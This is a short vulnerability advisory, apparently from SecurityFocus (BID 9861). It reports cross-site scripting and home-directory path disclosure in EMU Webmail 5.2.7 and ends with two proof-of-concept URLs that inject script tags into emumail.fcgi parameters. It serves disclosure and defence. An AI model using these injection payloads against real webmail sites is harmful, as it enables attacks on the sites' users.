8 lines
No EOL
630 B
Text
Executable file
8 lines
No EOL
630 B
Text
Executable file
source: http://www.securityfocus.com/bid/9861/info
|
|
|
|
Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out cross-site scripting attacks and disclose the path to the victim's home directory. The issues are reported to exist in the login script, 'emumail.fcgi' script and the 'init.emu' sample script.
|
|
|
|
EMU Webmail 5.2.7 has been reported to be affected by these issues.
|
|
|
|
http://www.example.com/webmail/emumail.fcgi?passed=parse&variable=%3Cscript%3Ealert( %22G%22)%3C/script%3E
|
|
http://www.example.com/webmail/emumail.fcgi?passed=go_index&folder=<script>alert("G")</script> |